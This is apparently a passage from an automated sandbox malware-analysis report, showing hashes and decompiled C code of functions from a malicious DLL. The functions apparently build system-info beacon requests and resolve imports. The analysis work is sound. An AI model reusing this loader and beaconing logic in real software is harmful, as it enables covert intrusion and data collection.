                                          • Source File: 00000000.00000002.519649525.00000000005F0000.00000040.00020000.sdmp, Offset: 005F0000, based on PE: true
                                          • Associated: 00000000.00000002.519749348.00000000005F5000.00000040.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.519817057.00000000005F7000.00000040.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5f0000_loaddll32.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                          • Instruction ID: 68fdd76ced2cedbbf8c1fe2ff445a458fb93d6eb4f9f1fc5b3d634b3f79ccd82
                                          • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                          • Instruction Fuzzy Hash: 2A21D6B69002099BCB10DF68C8C49BBBFA5FF88350F468569EA159B245D734FA15CBE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C20066, Relevance: .0, Instructions: 19COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521216705.0000000000C20000.00000040.00000001.sdmp, Offset: 00C20000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c20000_loaddll32.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6d6af18e62d48141748dec560edc45937fa8636c77b1ce60b66d1111b4985eae
                                          • Instruction ID: 48ecb0119360c2cf02584a7dd325e82a54f0792c686e397cc8a67155876b7d7e
                                          • Opcode Fuzzy Hash: 6d6af18e62d48141748dec560edc45937fa8636c77b1ce60b66d1111b4985eae
                                          • Instruction Fuzzy Hash: B8E0B6B1A00118EEEF15CA40CC40FF6B7BDEBC9700F0481D6A60CAA150D6306E848F60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C2029D, Relevance: .0, Instructions: 12COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521216705.0000000000C20000.00000040.00000001.sdmp, Offset: 00C20000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c20000_loaddll32.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 981ae7a2e560dead5f088f94c0b916592ccfa2d749defbc40be1ee7aea399cb3
                                          • Instruction ID: 0c27d4737e9b031e854781b069859cc89c411b73da2f202a3b6830c1d29b2dee
                                          • Opcode Fuzzy Hash: 981ae7a2e560dead5f088f94c0b916592ccfa2d749defbc40be1ee7aea399cb3
                                          • Instruction Fuzzy Hash: 05D09235E0026CDFCF20CA50C810BAAF3B2BF9A350F6600CAD8083720187302E82CE51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C7514F, Relevance: 34.7, APIs: 23, Instructions: 204memorystringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 66%
                                          			E00C7514F(long __eax, void* __ecx, void* __edx, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v48;
				intOrPtr _v56;
				void* __edi;
				long _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t34;
				intOrPtr _t35;
				int _t38;
				intOrPtr _t43;
				intOrPtr _t44;
				intOrPtr _t51;
				intOrPtr _t55;
				intOrPtr* _t57;
				intOrPtr _t63;
				intOrPtr _t65;
				intOrPtr _t71;
				intOrPtr _t74;
				intOrPtr _t77;
				int _t80;
				intOrPtr _t81;
				int _t84;
				intOrPtr _t86;
				int _t89;
				intOrPtr* _t92;
				intOrPtr* _t93;
				void* _t94;
				void* _t98;
				void* _t99;
				void* _t100;
				intOrPtr _t101;
				void* _t103;
				int _t104;
				void* _t105;
				void* _t106;
				void* _t108;
				void* _t109;
				void* _t111;

				_t98 = __edx;
				_t94 = __ecx;
				_t26 = __eax;
				_t108 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t26 = GetTickCount();
				}
				_t27 =  *0xc7d018; // 0x3df0b315
				asm("bswap eax");
				_t28 =  *0xc7d014; // 0x3a87c8cd
				asm("bswap eax");
				_t29 =  *0xc7d010; // 0xd8d2f808
				asm("bswap eax");
				_t30 =  *0xc7d00c; // 0x8f8f86c2
				asm("bswap eax");
				_t31 =  *0xc7d2a4; // 0x24ba5a8
				_t3 = _t31 + 0xc7e633; // 0x74666f73
				_t104 = wsprintfA(_t108, _t3, 2, 0x3d137, _t30, _t29, _t28, _t27,  *0xc7d02c,  *0xc7d004, _t26);
				_t34 = E00C757AB();
				_t35 =  *0xc7d2a4; // 0x24ba5a8
				_t4 = _t35 + 0xc7e673; // 0x74707526
				_t38 = wsprintfA(_t104 + _t108, _t4, _t34);
				_t111 = _t109 + 0x38;
				_t105 = _t104 + _t38;
				_t99 = E00C773E9(_t94);
				if(_t99 != 0) {
					_t86 =  *0xc7d2a4; // 0x24ba5a8
					_t6 = _t86 + 0xc7e8cb; // 0x736e6426
					_t89 = wsprintfA(_t105 + _t108, _t6, _t99);
					_t111 = _t111 + 0xc;
					_t105 = _t105 + _t89;
					HeapFree( *0xc7d238, 0, _t99);
				}
				_t100 = E00C7614A();
				if(_t100 != 0) {
					_t81 =  *0xc7d2a4; // 0x24ba5a8
					_t8 = _t81 + 0xc7e8d3; // 0x6f687726
					_t84 = wsprintfA(_t105 + _t108, _t8, _t100);
					_t111 = _t111 + 0xc;
					_t105 = _t105 + _t84;
					HeapFree( *0xc7d238, 0, _t100);
				}
				_t101 =  *0xc7d324; // 0x31395b0
				_a32 = E00C7757B(0xc7d00a, _t101 + 4);
				_t43 =  *0xc7d2cc; // 0x0
				if(_t43 != 0) {
					_t77 =  *0xc7d2a4; // 0x24ba5a8
					_t11 = _t77 + 0xc7e8ad; // 0x3d736f26
					_t80 = wsprintfA(_t105 + _t108, _t11, _t43);
					_t111 = _t111 + 0xc;
					_t105 = _t105 + _t80;
				}
				_t44 =  *0xc7d2c8; // 0x0
				if(_t44 != 0) {
					_t74 =  *0xc7d2a4; // 0x24ba5a8
					_t13 = _t74 + 0xc7e8a6; // 0x3d706926
					wsprintfA(_t105 + _t108, _t13, _t44);
				}
				if(_a32 != 0) {
					_t103 = RtlAllocateHeap( *0xc7d238, 0, 0x800);
					if(_t103 != 0) {
						E00C7749F(GetTickCount());
						_t51 =  *0xc7d324; // 0x31395b0
						__imp__(_t51 + 0x40);
						asm("lock xadd [eax], ecx");
						_t55 =  *0xc7d324; // 0x31395b0
						__imp__(_t55 + 0x40);
						_t57 =  *0xc7d324; // 0x31395b0
						_t106 = E00C74D2C(1, _t98, _t108,  *_t57);
						asm("lock xadd [eax], ecx");
						if(_t106 != 0) {
							StrTrimA(_t106, 0xc7c294);
							_t63 =  *0xc7d2a4; // 0x24ba5a8
							_push(_t106);
							_t15 = _t63 + 0xc7e252; // 0x616d692f
							_t65 = E00C79DEF(_t15);
							_v20 = _t65;
							if(_t65 != 0) {
								_t92 = __imp__;
								 *_t92(_t106, _v4);
								 *_t92(_t103, _v0);
								_t93 = __imp__;
								 *_t93(_t103, _v32);
								 *_t93(_t103, _t106);
								_t71 = E00C7666E(0xffffffffffffffff, _t103, _v32, _v28);
								_v56 = _t71;
								if(_t71 != 0 && _t71 != 0x10d2) {
									E00C76106();
								}
								HeapFree( *0xc7d238, 0, _v48);
							}
							HeapFree( *0xc7d238, 0, _t106);
						}
						HeapFree( *0xc7d238, 0, _t103);
					}
					HeapFree( *0xc7d238, 0, _a24);
				}
				HeapFree( *0xc7d238, 0, _t108);
				return _a12;
			}

















































                                          0x00c7514f
                                          0x00c7514f
                                          0x00c7514f
                                          0x00c75154
                                          0x00c7515a
                                          0x00c75164
                                          0x00c75166
                                          0x00c75166
                                          0x00c75173
                                          0x00c7517e
                                          0x00c75181
                                          0x00c7518c
                                          0x00c7518f
                                          0x00c75194
                                          0x00c75197
                                          0x00c7519c
                                          0x00c7519f
                                          0x00c751ab
                                          0x00c751b8
                                          0x00c751ba
                                          0x00c751c0
                                          0x00c751c5
                                          0x00c751d0
                                          0x00c751d2
                                          0x00c751d5
                                          0x00c751dc
                                          0x00c751e0
                                          0x00c751e2
                                          0x00c751e7
                                          0x00c751f3
                                          0x00c751f5
                                          0x00c75201
                                          0x00c75203
                                          0x00c75203
                                          0x00c7520e
                                          0x00c75212
                                          0x00c75214
                                          0x00c75219
                                          0x00c75225
                                          0x00c75227
                                          0x00c75233
                                          0x00c75235
                                          0x00c75235
                                          0x00c7523b
                                          0x00c7524e
                                          0x00c75252
                                          0x00c75259
                                          0x00c7525c
                                          0x00c75261
                                          0x00c7526c
                                          0x00c7526e
                                          0x00c75271
                                          0x00c75271
                                          0x00c75273
                                          0x00c7527a
                                          0x00c7527d
                                          0x00c75282
                                          0x00c7528c
                                          0x00c7528e
                                          0x00c75296
                                          0x00c752af
                                          0x00c752b3
                                          0x00c752bf
                                          0x00c752c4
                                          0x00c752cd
                                          0x00c752de
                                          0x00c752e2
                                          0x00c752eb
                                          0x00c752f1
                                          0x00c752fe
                                          0x00c7530b
                                          0x00c75311
                                          0x00c7531d
                                          0x00c75323
                                          0x00c75328
                                          0x00c75329
                                          0x00c75330
                                          0x00c75335
                                          0x00c7533b
                                          0x00c75341
                                          0x00c75348
                                          0x00c7534f
                                          0x00c75355
                                          0x00c7535c
                                          0x00c75360
                                          0x00c7536b
                                          0x00c75370
                                          0x00c75376
                                          0x00c7537f
                                          0x00c7537f
                                          0x00c75390
                                          0x00c75390
                                          0x00c7539f
                                          0x00c7539f
                                          0x00c753ae
                                          0x00c753ae
                                          0x00c753c0
                                          0x00c753c0
                                          0x00c753cf
                                          0x00c753e0

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 00C75166
                                          • wsprintfA.USER32 ref: 00C751B3
                                          • wsprintfA.USER32 ref: 00C751D0
                                          • wsprintfA.USER32 ref: 00C751F3
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00C75203
                                          • wsprintfA.USER32 ref: 00C75225
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00C75235
                                          • wsprintfA.USER32 ref: 00C7526C
                                          • wsprintfA.USER32 ref: 00C7528C
                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00C752A9
                                          • GetTickCount.KERNEL32 ref: 00C752B9
                                          • RtlEnterCriticalSection.NTDLL(03139570), ref: 00C752CD
                                          • RtlLeaveCriticalSection.NTDLL(03139570), ref: 00C752EB
                                            • Part of subcall function 00C74D2C: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,00C752FE,?,031395B0), ref: 00C74D57
                                            • Part of subcall function 00C74D2C: lstrlen.KERNEL32(?,?,?,00C752FE,?,031395B0), ref: 00C74D5F
                                            • Part of subcall function 00C74D2C: strcpy.NTDLL ref: 00C74D76
                                            • Part of subcall function 00C74D2C: lstrcat.KERNEL32(00000000,?), ref: 00C74D81
                                            • Part of subcall function 00C74D2C: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00C752FE,?,031395B0), ref: 00C74D9E
                                          • StrTrimA.SHLWAPI(00000000,00C7C294,?,031395B0), ref: 00C7531D
                                            • Part of subcall function 00C79DEF: lstrlen.KERNEL32(?,00000000,00000000,00C75335,616D692F,00000000), ref: 00C79DFB
                                            • Part of subcall function 00C79DEF: lstrlen.KERNEL32(?), ref: 00C79E03
                                            • Part of subcall function 00C79DEF: lstrcpy.KERNEL32(00000000,?), ref: 00C79E1A
                                            • Part of subcall function 00C79DEF: lstrcat.KERNEL32(00000000,?), ref: 00C79E25
                                          • lstrcpy.KERNEL32(00000000,?), ref: 00C75348
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7534F
                                          • lstrcat.KERNEL32(00000000,?), ref: 00C7535C
                                          • lstrcat.KERNEL32(00000000,00000000), ref: 00C75360
                                            • Part of subcall function 00C7666E: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,751881D0), ref: 00C76720
                                          • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 00C75390
                                          • HeapFree.KERNEL32(00000000,00000000,616D692F,00000000), ref: 00C7539F
                                          • HeapFree.KERNEL32(00000000,00000000,?,031395B0), ref: 00C753AE
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00C753C0
                                          • HeapFree.KERNEL32(00000000,?), ref: 00C753CF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                          • String ID:
                                          • API String ID: 3080378247-0
                                          • Opcode ID: 81a50f3e5cae4b3e3091855bae3350ba35ba6ea2e8fdae7f14ba9a3763edd1cf
                                          • Instruction ID: c1781026640751aa3e4d27b2ea69cd5680b8b6e06f590f100ed6cb3591054f58
                                          • Opcode Fuzzy Hash: 81a50f3e5cae4b3e3091855bae3350ba35ba6ea2e8fdae7f14ba9a3763edd1cf
                                          • Instruction Fuzzy Hash: F7617972500605AFD7119B68EC88F5E7BB8EF48340F054118F90EDB272DB35ED869BA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C7ADA5, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209libraryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 51%
                                          			E00C7ADA5(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0xc70000;
				_t115 = _t139[3] + 0xc70000;
				_t131 = _t139[4] + 0xc70000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0xc70000;
				_v16 = _t139[5] + 0xc70000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0xc70002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0xc7d1a0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0xc7d1a0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0xc7d1a0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0xc7d19c; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0xc7d1a0; // 0x0
					if(_t98 == 0) {
						L9:
						_t138 = LoadLibraryA(_v60);
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0xc7d198; // 0x0
										 *_t102 = _t125;
										 *0xc7d198 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0xc7d19c; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}

































                                          0x00c7adb4
                                          0x00c7adca
                                          0x00c7add0
                                          0x00c7add2
                                          0x00c7add7
                                          0x00c7addd
                                          0x00c7ade2
                                          0x00c7ade5
                                          0x00c7adf3
                                          0x00c7adfa
                                          0x00c7adfd
                                          0x00c7ae00
                                          0x00c7ae01
                                          0x00c7ae04
                                          0x00c7ae07
                                          0x00c7ae0a
                                          0x00c7ae0f
                                          0x00c7ae1e
                                          0x00000000
                                          0x00c7ae24
                                          0x00c7ae2e
                                          0x00c7ae38
                                          0x00c7ae3d
                                          0x00c7ae3f
                                          0x00c7ae49
                                          0x00c7ae4c
                                          0x00c7ae4f
                                          0x00c7ae55
                                          0x00c7ae57
                                          0x00c7ae57
                                          0x00c7ae5a
                                          0x00c7ae5d
                                          0x00c7ae62
                                          0x00c7ae66
                                          0x00c7ae79
                                          0x00c7ae7b
                                          0x00c7af23
                                          0x00c7af23
                                          0x00c7af2a
                                          0x00c7af2d
                                          0x00c7af37
                                          0x00c7af37
                                          0x00c7af3b
                                          0x00c7afb9
                                          0x00c7afbc
                                          0x00c7afbe
                                          0x00c7afbe
                                          0x00c7afc5
                                          0x00c7afc7
                                          0x00c7afd1
                                          0x00c7afd4
                                          0x00c7afd7
                                          0x00c7afd7
                                          0x00000000
                                          0x00c7af3d
                                          0x00c7af40
                                          0x00c7af6e
                                          0x00c7af78
                                          0x00c7af7c
                                          0x00c7af84
                                          0x00c7af87
                                          0x00c7af8e
                                          0x00c7af98
                                          0x00c7af98
                                          0x00c7af9c
                                          0x00c7afa1
                                          0x00c7afb0
                                          0x00c7afb6
                                          0x00c7afb6
                                          0x00c7af9c
                                          0x00000000
                                          0x00c7af47
                                          0x00c7af4a
                                          0x00c7af52
                                          0x00c7af67
                                          0x00c7af6c
                                          0x00000000
                                          0x00000000
                                          0x00c7af6c
                                          0x00000000
                                          0x00c7af52
                                          0x00c7af40
                                          0x00c7af3b
                                          0x00c7ae81
                                          0x00c7ae88
                                          0x00c7ae98
                                          0x00c7aea1
                                          0x00c7aea5
                                          0x00c7aee8
                                          0x00c7aef4
                                          0x00c7af1d
                                          0x00c7aef6
                                          0x00c7aefa
                                          0x00c7af00
                                          0x00c7af08
                                          0x00c7af0a
                                          0x00c7af0d
                                          0x00c7af13
                                          0x00c7af15
                                          0x00c7af15
                                          0x00c7af08
                                          0x00c7aefa
                                          0x00000000
                                          0x00c7aef4
                                          0x00c7aead
                                          0x00c7aeb0
                                          0x00c7aeb7
                                          0x00c7aec7
                                          0x00c7aeca
                                          0x00c7aeda
                                          0x00000000
                                          0x00c7aee0
                                          0x00c7aec1
                                          0x00c7aec5
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00c7aec5
                                          0x00c7ae92
                                          0x00c7ae96
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00c7ae96
                                          0x00c7ae6f
                                          0x00c7ae73
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          APIs
                                          • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7AE1E
                                          • LoadLibraryA.KERNEL32(?), ref: 00C7AE9B
                                          • GetLastError.KERNEL32 ref: 00C7AEA7
                                          • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 00C7AEDA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                          • String ID: $
                                          • API String ID: 948315288-3993045852
                                          • Opcode ID: cc9bcb2c1035a0383083ba5970b8052b1e0437ae8faf401e6f0e1d548c05c6d3
                                          • Instruction ID: dfb63505b58f4a63bc1555337f2b14dd1e611ef3aeef7ce4959cc33297495f7a
                                          • Opcode Fuzzy Hash: cc9bcb2c1035a0383083ba5970b8052b1e0437ae8faf401e6f0e1d548c05c6d3
                                          • Instruction Fuzzy Hash: CB812AB1A00205EFDB15CFA9D884BAEB7F5FF88310F148029E919E7250EB70EA45CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C730FC, Relevance: 15.1, APIs: 10, Instructions: 102stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 56%
                                          			E00C730FC(void* __ecx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				signed int _v20;
				void* __esi;
				intOrPtr _t42;
				intOrPtr _t44;
				void* _t46;
				void* _t47;
				void* _t48;
				int _t49;
				intOrPtr _t53;
				WCHAR* _t56;
				void* _t57;
				int _t58;
				intOrPtr _t64;
				void* _t69;
				intOrPtr* _t73;
				void* _t74;
				intOrPtr _t75;
				intOrPtr _t79;
				intOrPtr* _t85;
				intOrPtr _t88;

				_t74 = __ecx;
				_t79 =  *0xc7d33c; // 0x3139bb0
				_v20 = 8;
				_v16 = GetTickCount();
				_t42 = E00C79810(_t74,  &_v16);
				_v12 = _t42;
				if(_t42 == 0) {
					_v12 = 0xc7c19c;
				}
				_t44 = E00C747E1(_t79);
				_v8 = _t44;
				if(_t44 != 0) {
					_t85 = __imp__;
					_t46 =  *_t85(_v12, _t69);
					_t47 =  *_t85(_v8);
					_t48 =  *_t85(_a4);
					_t49 = lstrlenW(_a8);
					_t53 = E00C758BE(lstrlenW(0xc7eb38) + _t48 + _t46 + _t46 + _t47 + _t49 + lstrlenW(0xc7eb38) + _t48 + _t46 + _t46 + _t47 + _t49 + 2);
					_v16 = _t53;
					if(_t53 != 0) {
						_t75 =  *0xc7d2a4; // 0x24ba5a8
						_t73 =  *0xc7d11c; // 0xc7abc9
						_t18 = _t75 + 0xc7eb38; // 0x530025
						 *_t73(_t53, _t18, _v12, _v12, _a4, _v8, _a8);
						_t56 =  *_t85(_v8);
						_a8 = _t56;
						_t57 =  *_t85(_a4);
						_t58 = lstrlenW(_a12);
						_t88 = E00C758BE(lstrlenW(0xc7ec58) + _a8 + _t57 + _t58 + lstrlenW(0xc7ec58) + _a8 + _t57 + _t58 + 2);
						if(_t88 == 0) {
							E00C7147E(_v16);
						} else {
							_t64 =  *0xc7d2a4; // 0x24ba5a8
							_t31 = _t64 + 0xc7ec58; // 0x73006d
							 *_t73(_t88, _t31, _a4, _v8, _a12);
							 *_a16 = _v16;
							_v20 = _v20 & 0x00000000;
							 *_a20 = _t88;
						}
					}
					E00C7147E(_v8);
				}
				return _v20;
			}


























                                          0x00c730fc
                                          0x00c73104
                                          0x00c7310a
                                          0x00c7311a
                                          0x00c7311d
                                          0x00c73122
                                          0x00c73127
                                          0x00c73129
                                          0x00c73129
                                          0x00c73132
                                          0x00c73137
                                          0x00c7313c
                                          0x00c73142
                                          0x00c7314c
                                          0x00c73155
                                          0x00c7315c
                                          0x00c7316a
                                          0x00c7317c
                                          0x00c73181
                                          0x00c73186
                                          0x00c7318f
                                          0x00c73198
                                          0x00c731a1
                                          0x00c731af
                                          0x00c731b7
                                          0x00c731bc
                                          0x00c731bf
                                          0x00c731ca
                                          0x00c731e1
                                          0x00c731e5
                                          0x00c73218
                                          0x00c731e7
                                          0x00c731ea
                                          0x00c731f2
                                          0x00c731fd
                                          0x00c73205
                                          0x00c7320d
                                          0x00c73211
                                          0x00c73211
                                          0x00c731e5
                                          0x00c73220
                                          0x00c73225
                                          0x00c7322c

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 00C73111
                                          • lstrlen.KERNEL32(00000000,80000002), ref: 00C7314C
                                          • lstrlen.KERNEL32(?), ref: 00C73155
                                          • lstrlen.KERNEL32(00000000), ref: 00C7315C
                                          • lstrlenW.KERNEL32(80000002), ref: 00C7316A
                                          • lstrlenW.KERNEL32(00C7EB38), ref: 00C73173
                                          • lstrlen.KERNEL32(?), ref: 00C731B7
                                          • lstrlen.KERNEL32(?), ref: 00C731BF
                                          • lstrlenW.KERNEL32(?), ref: 00C731CA
                                          • lstrlenW.KERNEL32(00C7EC58), ref: 00C731D3
                                            • Part of subcall function 00C7147E: HeapFree.KERNEL32(00000000,00000000,00C71D11,00000000,?,?,-00000008), ref: 00C7148A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: lstrlen$CountFreeHeapTick
                                          • String ID:
                                          • API String ID: 2535036572-0
                                          • Opcode ID: a61d799d12b078cbc3a86b88d2efed11fd9a32c642d04828b0e8cbbd34958cdf
                                          • Instruction ID: 5ef699eed716a595e501183cac14bb6ddb6d2bb8f84a70585daa3f9a47f1b939
                                          • Opcode Fuzzy Hash: a61d799d12b078cbc3a86b88d2efed11fd9a32c642d04828b0e8cbbd34958cdf
                                          • Instruction Fuzzy Hash: 91314B76D0010AEFCF01AFA4CC4599E7FB9FF48354B1580A5E918AB222DB31DA11EF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 005F15C2, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104librarystringloaderCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E005F15C2(intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				signed short _v12;
				struct HINSTANCE__* _v16;
				intOrPtr _v20;
				_Unknown_base(*)()* _v24;
				intOrPtr _t34;
				intOrPtr _t36;
				struct HINSTANCE__* _t37;
				intOrPtr _t40;
				CHAR* _t44;
				_Unknown_base(*)()* _t45;
				intOrPtr* _t52;
				intOrPtr _t53;
				signed short _t54;
				intOrPtr* _t57;
				signed short _t59;
				CHAR* _t60;
				CHAR* _t62;
				signed short* _t64;
				void* _t65;
				signed short _t72;

				_t34 =  *((intOrPtr*)(_a8 + 0x80));
				_v8 = _v8 & 0x00000000;
				_t52 = _a4;
				if(_t34 == 0) {
					L28:
					return _v8;
				}
				_t57 = _t34 + _t52;
				_t36 =  *((intOrPtr*)(_t57 + 0xc));
				_a4 = _t57;
				if(_t36 == 0) {
					L27:
					goto L28;
				}
				while(1) {
					_t62 = _t36 + _t52;
					_t37 = LoadLibraryA(_t62);
					_v16 = _t37;
					if(_t37 == 0) {
						break;
					}
					_v12 = _v12 & 0x00000000;
					memset(_t62, 0, lstrlenA(_t62));
					_t53 =  *_t57;
					_t40 =  *((intOrPtr*)(_t57 + 0x10));
					_t65 = _t65 + 0xc;
					if(_t53 != 0) {
						L6:
						_t64 = _t53 + _t52;
						_t54 =  *_t64;
						if(_t54 == 0) {
							L23:
							_t36 =  *((intOrPtr*)(_t57 + 0x20));
							_t57 = _t57 + 0x14;
							_a4 = _t57;
							if(_t36 != 0) {
								continue;
							}
							L26:
							goto L27;
						}
